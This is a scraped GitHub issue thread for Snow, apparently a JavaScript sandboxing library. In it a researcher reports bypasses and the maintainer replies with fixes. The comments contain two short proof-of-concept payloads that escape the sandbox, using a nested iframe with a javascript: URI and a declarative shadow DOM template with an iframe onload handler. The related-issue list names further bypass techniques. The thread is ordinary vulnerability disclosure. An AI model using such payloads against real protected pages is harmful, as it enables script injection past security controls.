Comments (3)
arxenix
commented on July 18, 2024
Turns out that you don't need a shadow DOM at all for this. Simply:
f = document.createElement('iframe');
f.srcdoc = '<iframe src="javascript:alert(document.domain)"></iframe>';
document.body.appendChild(f);
declarative shadow DOM might be a separate issue though, because you can still use it to prevent snow from stripping onload attributes (#32 ):
f = document.createElement('iframe');
// works for both open and closed shadowroot
f.srcdoc = `
<my-element>
<template id="x" shadowroot="closed">
<b>In Template & ShadowDOM</b>
<iframe onload="this.contentWindow.alert.call(top, top.origin)"></iframe>
</template>
</my-element>
`;
document.body.appendChild(f);
from snow.
weizman
commented on July 18, 2024
Awesome catch, I honestly have never heard of declarative shadow DOMs before this.
For now the solution would be to block declarative shadow DOMs when are injected this way, visit #46 to learn more about this decision.
Regarding your other catch which doesn't involve declarative shadow DOMs at all (which is unrelated to this issue), #48 should fix this.
from snow.
weizman
commented on July 18, 2024
if disallowing usage of declarative shadow DOMs the way Snow does (#44 (comment)) prevents your application from running correctly, please share so in this issue thread so we can discuss the problem and understand how to best deal with it
from snow.
Related Issues (20)
- Hooks for "addEventListener" and "removeEventListener" are wrongly depending on "this" HOT 1
- Bypasses via Blob URIs HOT 6
- Bug in JSON parsing on TikTok caused by Snow HOT 1
- Custom elements are still vulnerable HOT 1
- Firefox tests fail to run document.write calls HOT 2
- Old Snow tests show Snow vulnerability on Firefox HOT 3
- Firefox does not respect addEventListener calls made with EventTarget of a detached realm HOT 1
- Snow can be bypassed with document.open('', '', '') HOT 2
- Snow can be bypassed with window.parent.alert(...) HOT 2
- Snow can be bypassed with postMessage from iframe by accessing event.source and event.currentTarget HOT 3
- Snow can be bypassed with ...data: URI HOT 10
- Snow can be bypassed with frameSet HOT 3
- documentPictureInPicture bypasses snow HOT 6
- Demo has insecure implementation HOT 1
- more javascript uri bypasses with target attr HOT 3
- Clash when snow protected page opens itself
- Open window, than open iframe seems to bypass Snow HOT 1
- Bypass with Range.insertNode HOT 2
- Blob override is not good enough and clashes with whatwg-fetch npm package HOT 2
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from snow.